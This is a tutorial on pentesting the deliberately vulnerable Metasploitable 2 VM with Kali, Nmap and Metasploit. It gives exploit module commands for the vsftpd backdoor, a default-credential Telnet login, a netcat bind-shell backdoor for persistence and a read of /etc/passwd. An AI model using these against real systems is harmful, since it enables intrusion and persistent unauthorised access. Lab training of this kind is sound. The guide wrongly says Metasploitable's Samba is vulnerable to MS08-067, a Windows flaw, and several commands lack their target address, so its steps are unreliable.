Introduction
Penetration testing (pentesting) is an essential practice in cybersecurity, allowing security professionals to identify vulnerabilities within a system. Metasploitable is a deliberately vulnerable virtual machine used for penetration testing and ethical hacking practice. In this article, we will explore how to perform penetration testing on Metasploitable using Kali Linux and Metasploit Framework.
Prerequisites
Before starting, ensure you have:
- Kali Linux installed (either as a virtual machine or on bare metal)
- Metasploitable 2 VM installed on VirtualBox or VMware
- Basic knowledge of Linux commands and networking
- Nmap and Metasploit Framework installed (Pre-installed in Kali Linux)
Step 1: Setting Up Metasploitable
- Download Metasploitable from https://sourceforge.net/projects/metasploitable/.
- Extract the
.zipfile and import the.vmdkfile into VirtualBox or VMware. - Assign a Host-Only Network or a Bridged Adapter to ensure connectivity between Kali Linux and Metasploitable.
- Start the Metasploitable VM and log in using the default credentials:
Username: msfadmin Password: msfadmin
- Obtain the IP address using:
ifconfig
Step 2: Scanning the Target with Nmap
Nmap is a powerful network scanning tool that helps identify open ports and running services.
Run the following command to scan the Metasploitable machine:
nmap -A -v
Example output:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
This output provides information about open ports and running services, which can be exploited.
Step 3: Exploiting Vulnerabilities with Metasploit
1. Exploiting VSFTPD 2.3.4 Backdoor (Port 21)
VSFTPD 2.3.4 is a vulnerable FTP server that contains a backdoor.
Steps:
- Open Metasploit by typing:
msfconsole - Search for the VSFTPD exploit:
search vsftpd - Use the exploit module:
use exploit/unix/ftp/vsftpd_234_backdoor - Set the target IP:
set RHOST - Execute the exploit:
exploit - If successful, you should receive a root shell:
whoami root
2. Exploiting Telnet Service (Port 23)
Telnet is enabled on Metasploitable with a weak password.
Steps:
- Connect to the Telnet service:
telnet - Enter the default credentials:
Login: msfadmin Password: msfadmin - Once logged in, you have shell access to the machine.
3. Exploiting Samba Service (Port 445) Using Metasploit
Samba on Metasploitable has a known vulnerability (MS08-067).
Steps:
- Search for the exploit:
search ms08_067 - Use the exploit module:
use exploit/windows/smb/ms08_067_netapi - Set the target IP:
set RHOST - Execute the exploit:
exploit - If successful, you will have a Meterpreter session:
meterpreter > sysinfo
Step 4: Post-Exploitation Activities
Once access is gained, various post-exploitation techniques can be performed:
- Extract User Information:
cat /etc/passwd - Check for Root Privileges:
sudo -l - Create a Backdoor for Persistent Access:
netcat -lvp 4444 -e /bin/bash
Step 5: Reporting Findings and Mitigations
After performing the penetration test, document the findings, including:
- Vulnerabilities identified
- Exploits used
- Recommended mitigations (e.g., disabling unused services, applying patches, using strong credentials)
Example Mitigation Steps
- Disable Telnet and use SSH with key-based authentication.
- Update Samba to the latest version to patch known exploits.
- Restrict FTP access and disable anonymous login.
Conclusion
Metasploitable is a great platform for learning penetration testing in a controlled environment. In this guide, we covered:
- Scanning a target with Nmap
- Exploiting vulnerabilities using Metasploit
- Performing post-exploitation activities
- Mitigation strategies to secure the system
By practicing these techniques, security professionals can enhance their ethical hacking skills and better understand system vulnerabilities. Always conduct penetration testing ethically and with permission.